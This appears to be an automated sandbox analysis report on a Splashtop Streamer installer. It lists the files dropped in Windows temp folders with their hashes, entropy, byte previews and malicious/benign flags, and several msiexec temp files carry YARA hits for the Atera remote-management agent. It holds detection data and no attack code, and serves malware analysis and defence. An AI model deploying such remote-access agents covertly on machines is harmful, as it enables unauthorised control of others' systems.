                                                                                                                                                                                                                                                                                              Preview:[.7.0.0.0.].2.0.2.5.-.0.1.-.0.6. .0.6.:.5.9.:.1.9. . .[.C.U.t.i.l.i.t.y.:.:.O.S.I.n.f.o.]. .O.S. .1.0...0.(.1.9.0.4.5.). . .x.6.4.:.1. .(.L.a.s.t.=.0.).....[.7.0.0.0.].2.0.2.5.-.0.1.-.0.6. .0.6.:.5.9.:.1.9. . .[.C.U.n.P.a.c.k.:.:.F.i.n.d.H.e.a.d.e.r.]. .N.a.m.e.:.C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.S.p.l.a.s.h.t.o.p.S.t.r.e.a.m.e.r...e.x.e. .(.L.a.s.t.=.0.).....[.7.0.0.0.].2.0.2.5.-.0.1.-.0.6. .0.6.:.5.9.:.1.9. . .[.C.U.n.P.a.c.k.:.:.F.i.n.d.H.e.a.d.e.r.]. .S.i.g.n. .S.i.z.e.:.1.0.2.4.0. .(.L.a.s.t.=.0.).....[.7.0.0.0.].2.0.2.5.-.0.1.-.0.6. .0.6.:.5.9.:.1.9. . .[.C.U.n.P.a.c.k.:.:.F.i.n.d.H.e.a.d.e.r.]. .H.e.a.d.e.r. .o.f.f.s.e.t.:.4.3.4.1.7.6. .(.L.a.s.t.=.1.8.3.).....[.7.0.0.0.].2.0.2.5.-.0.1.-.0.6. .0.6.:.5.9.:.1.9. . .[.C.U.n.P.a.c.k.:.:.U.n.P.a.c.k.F.i.l.e.s.]. . .F.r.e.e.S.p.a.c.e.:.1.8.0.9.2.5.4.9.7.3.4.4. .F.i.l.e.S.i.z.e.:.5.3.0.7.5.4.5.6. .(.L.a.s.t.=.0.).....[.7.0.0.0.].2.0.2.5.-.0.1.-.0.6. .0.6.:.5.9.:.1.9. . .[.C.U.n.P.a.c.k.:.:.U.n.P.a.c.k.F.i.l.e.s.]. .(.1./.5.).U.n.P.a.c.k.

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\unpack\PreVerCheck.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3383808
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.34380572306996
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:98304:nNOTMA1lvHRzotzo5YuCpvBgSq8/R58hgpwVHSSWU:7AXvRMtUiuCpJgSVR58hS1U
                                                                                                                                                                                                                                                                                              MD5:2C18826ADF72365827F780B2A1D5EA75
                                                                                                                                                                                                                                                                                              SHA1:A85B5EAE6EBA4AF001D03996F48D97F7791E36EB
                                                                                                                                                                                                                                                                                              SHA-256:AE06A5A23B6C61D250E8C28534ED0FFA8CC0C69B891C670FFAF54A43A9BF43BE
                                                                                                                                                                                                                                                                                              SHA-512:474FCE1EC243B9F63EA3D427EB1117AD2EBC5A122F64853C5015193E6727FFC8083C5938117B66E572DA3739FD0A86CD5BC118F374C690FA7A5FE9F0C071C167
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K.c...0...0...0...1...0...1...0..K0...0...1...0...1...0...18..0...1...0...1...0...0%..0...1...0..00...0..X0...0...1...0Rich...0........................PE..L.....Gg...............*.....r0..............0....@...........................3.....rM4...@..........................................P..@-/..........z3..(....3..'......p...............................@............0...............................text...(........................... ..`.rdata..n....0......................@..@.data...4....0......................@....rsrc...@-/..P..../..$..............@..@.reloc...'....3..(...R3.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\unpack\run.bat

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9995812306460645
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1X6AZJ:1qAX
                                                                                                                                                                                                                                                                                              MD5:56884732C1B8ABCBA0A31746DF533D97
                                                                                                                                                                                                                                                                                              SHA1:662FA5002ACCB46261763B57F6A772E0A2AA5DDF
                                                                                                                                                                                                                                                                                              SHA-256:A6212DAAA9A377B202A9436D80AB97BC9B0050DC7E174FCD35F255B34500CFAB
                                                                                                                                                                                                                                                                                              SHA-512:8D5817660238082002FB42447D3B614C5099C8C691D4D091BE54BDDC5958A854628083BCCA191E6E45C85E70A8C6DCB5D2CBB4E2A3E5D255F5695139347E539C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PreVerCheck.exe

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\unpack\setup.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:Generic INItialization configuration [REGPATH]
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1528
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6192017888227515
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:Zem6aTKgWT8SoBz09LAjUeiKbd8fusQK5oqAeEVhqY0+c8Eo/VoijXOR+7G2eHNl:gi+Noh0dBeNbMoqvEV0Y0+bjjXD7FwNl
                                                                                                                                                                                                                                                                                              MD5:FC5DE1FEA9170B61439922A367A12478
                                                                                                                                                                                                                                                                                              SHA1:96941D31908B0CB49ADEABBDFCC43508F2B99B36
                                                                                                                                                                                                                                                                                              SHA-256:087BA98D89B1E1366D04A909AC09D109BB80A872B6D5C38E29568DBEE5B116F1
                                                                                                                                                                                                                                                                                              SHA-512:6423294E13EA896CE12E8369101CDEAF6EB467CC60A2852E5145BE12CD8EE1189A8508A59FAF504BB4BC90593F451EC09291662E6BD43438BBCAC57F2B69613B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:[CUSTOMSETTING]..REGEXTSECT=Splashtop Remote Server for Business..INSTDRV=0x81..BASEDTYPE=1....[REGPATH]..NUM=2..REGPATH_01=Splashtop Remote Server..REGPATH_02=Splashtop Remote Server for Business....;Common..[REGISTRY]..CSRSMode=1..confirm_d=1..EnableNvFBC=@NO:0..EnableADEM=@NO:0....;STE..[REGISTRY_Splashtop Remote Server for Business]..EnableAutoUpgrade=0..CloudUserAgent=@SX:business..EnableIQSV=0..USERTRACK_NAME=@SO:SCRS00....[PREVERCHECK]..PRODUCTID={B7C5EA94-B96A-41F5-BE95-25D78B486678}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..PRODUCTNAME=Splashtop Streamer..SSUNAME=PROTOIRIS00..SSUPRODUCT=SVR..COMPATIBLE_NUM=4....[PREVERCHECKREG]..REGKEYPATH_NUM=2..REGKEYPATH_MAIN=0..REGKEYPATH_0=Splashtop Remote Server,1..REGKEYPATH_1=Splashtop Remote Server for Business,0....;ST2..[COMPATIBLE_0]..PRODUCTID={2EFEAD58-3311-4B2B-9D8A-8D663581D109}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..SSUNAME=PROTOIRIS00..FORCESTEMODE=0....;S4B Prodcut name with Splashtop Streamer for Busine

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\unpack\setup.msi

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 936, Title: Installation Database, Subject: Splashtop Streamer, Author: Splashtop Inc., Keywords: Installer,MSI,Database, Comments: Splashtop Streamer Installer, Create Time/Date: Wed Nov 27 19:46:34 2024, Name of Creating Application: InstallShield?2021 27, Security: 1, Template: Intel;0,1033,2052,1028,1036,1031,1040,1041,1042,1046,1049,1034, Last Saved By: Intel;2052, Revision Number: {B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.4;{B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.4;{001F085C-058A-480B-AD56-2940B857C38D}, Number of Pages: 200, Number of Characters: 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):53075456
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.963205524800128
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1572864:snOdpvYs+cvrrjOAYfDJnEAOns5w5k8BzFl73:sQNLOAYfzOBO8B3
                                                                                                                                                                                                                                                                                              MD5:94938EB1C2006B2C0A2B53F976F074D0
                                                                                                                                                                                                                                                                                              SHA1:85351B97E9EC8F6A81EE98EDAF3F22213C14EF7C
                                                                                                                                                                                                                                                                                              SHA-256:6FF1D88358B823C3390639FE740774AE1D6CADDB8E46C482D7F6104B403D3A3D
                                                                                                                                                                                                                                                                                              SHA-512:16F9285F7D9238E27E640241C25E154729B9CE33F2C3A9CDCF6F01633B9BE9B78550C43735A5C0316671E19B8A415E4DED9C2E4E23445268E871BFEBE2902856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...................*...............8........6........................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-......./.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;.................................................................................................................. ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...B...M...:...<.......=...........@...A...:...C...D...E...F...G...H...I...J...N...L...........O...P...Q...R...S...T...U...Z...W...X...Y.......[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\unpack\uninst.iss

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):988
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.127699291644866
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:RjUcBbUcBIP+ijUcBIDQUcBIPEUcBIDv0zWatYh7+ifPcPvo7PZn+i4TjnPTvY:9UQUhGijU90UhMU9odOyifEIzZ+i4PPc
                                                                                                                                                                                                                                                                                              MD5:5DBDCF8D475069C447F676D56327382B
                                                                                                                                                                                                                                                                                              SHA1:08A0CA9150DCFA9D46370A340F000504D7772032
                                                                                                                                                                                                                                                                                              SHA-256:EDAC85170F8B70F30E7F7080B34664B186B635520FFBC011CD9AB6257BAB78A8
                                                                                                                                                                                                                                                                                              SHA-512:81CE6716D4F58CEA4194FA5FF42EE22C2D2686DD0A097DC384E797411587A2071A4070E3ECF5B7E9571FF5D29C2DFD0ED197B6890D70BDFECE376E7E0340CEE1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:;Unistall..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-DlgOrder]..Dlg0={B7C5EA94-B96A-41F5-BE95-25D78B486678}-MessageBox-0..Count=2..Dlg1={B7C5EA94-B96A-41F5-BE95-25D78B486678}-SdFinish-0..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-MessageBox-0]..Result=6..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0....;Unistall 140..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-DlgOrder]..Dlg0={9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-MessageBox-0..Count=2..Dlg1={9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-SdFinish-0..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-MessageBox-0]..Result=6..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-DlgOrder]..Dlg0={94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-MessageBox-0..Count=2..Dlg1={94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-SdFinish-0..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-MessageBox-0]..Result=6..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0..

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF11C272573AE5B6C2.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF131EC5E3B313502A.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF13A48084247EF5A1.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.5701520453577955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:sp8PhluRc06WXJsFT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:skhl1PFTlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:E4BF5E06B9C0886D6CBFC3D68E095B0E
                                                                                                                                                                                                                                                                                              SHA1:7437D28CE9985FC0554FDFF9F991BDD1AD5C5BBA
                                                                                                                                                                                                                                                                                              SHA-256:0F5C40FDF1AEF16B0EC5FC509BB7567705A855ADFB45EAB045B649DD6242A38A
                                                                                                                                                                                                                                                                                              SHA-512:5E9F5B4701A1174A020BB6CB8D653DA54E63E4B474B074A691CC726AD1C4F8B6E296640F4CD9CE6E51CD48E4F83EDA499C1F8B1B9106F5563438F8E35C1D106F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF13A48084247EF5A1.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF14B7E2773E7C33C4.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2567140222927486
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:0gduksPveFXJhT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:9dr5TlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:A30478549D793290405A8B0126F7C0C0
                                                                                                                                                                                                                                                                                              SHA1:A2435F6FD86F749B92BF2C41A966B2C036DBED70
                                                                                                                                                                                                                                                                                              SHA-256:AE2C0DF62B1CB042E660217586918E98DD0756DC50227E68F0308CAD95C6A331
                                                                                                                                                                                                                                                                                              SHA-512:6DCFE8EE240DE0FB2490AA86307F230F44BACC6FFF73DCF00C80E3FF3822A29479D86316F684B05A259765B8B9551495D49605C65B5889345E0B3C76C86E9A1F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF14B7E2773E7C33C4.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF165ACD25A5E1C6CA.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF18C3B2AA98B412A3.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2309993325116284
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3VUuKNveFXJ5T5CDyqISoedGPdGTWaStedGPdGTn:lU8hTkDHIOD
                                                                                                                                                                                                                                                                                              MD5:FCF8BEAA29D6285CFF2000F44F4B5972
                                                                                                                                                                                                                                                                                              SHA1:E80DDE73FF4C29E48F5AF474C1479F4C0AD9346D
                                                                                                                                                                                                                                                                                              SHA-256:81E2E2373C75874284C496257AFDEDE5F9FFD13077B1BA8181110017F962093C
                                                                                                                                                                                                                                                                                              SHA-512:DCF47F5317C3EF5536F31770F2A769157F01190CD30C776C372A6CE8DE13917AE782AB42E681DF3716E3136790B0C33D6E204ECFA2B855530366DB0C5CBF5B4A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF18C3B2AA98B412A3.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF18C3B2AA98B412A3.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF2C154A89BDA544DA.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0006922475342237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:DMMXukNveFXJ5T5p4DKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:tXehTn4DvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:46CE44BED22189CF1AB2CF61EED86FE2
                                                                                                                                                                                                                                                                                              SHA1:51F6D0431C65B24E1FDAD9F41DA11E267A3D63E9
                                                                                                                                                                                                                                                                                              SHA-256:380BA4720745AC4D45211A415B36E693D73B5266A43399D0D837F9C0C06043BA
                                                                                                                                                                                                                                                                                              SHA-512:4368A1653BE8A0A5894A3CED2FBF165C7335D784C04D706834A18ED814A9998C072495900FC8D4558AD303A41C6F349943DB84A7F24A7C60FD34E05B223FF6F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF2C154A89BDA544DA.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF3D009E1553475C8A.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF3FF0FFC0E6D9BCB4.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF4ABAF93AAD4B12FE.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2567140222927486
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:0gduksPveFXJhT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:9dr5TlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:A30478549D793290405A8B0126F7C0C0
                                                                                                                                                                                                                                                                                              SHA1:A2435F6FD86F749B92BF2C41A966B2C036DBED70
                                                                                                                                                                                                                                                                                              SHA-256:AE2C0DF62B1CB042E660217586918E98DD0756DC50227E68F0308CAD95C6A331
                                                                                                                                                                                                                                                                                              SHA-512:6DCFE8EE240DE0FB2490AA86307F230F44BACC6FFF73DCF00C80E3FF3822A29479D86316F684B05A259765B8B9551495D49605C65B5889345E0B3C76C86E9A1F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF4ABAF93AAD4B12FE.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\~DF4CF4F864979CC747.TMP

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
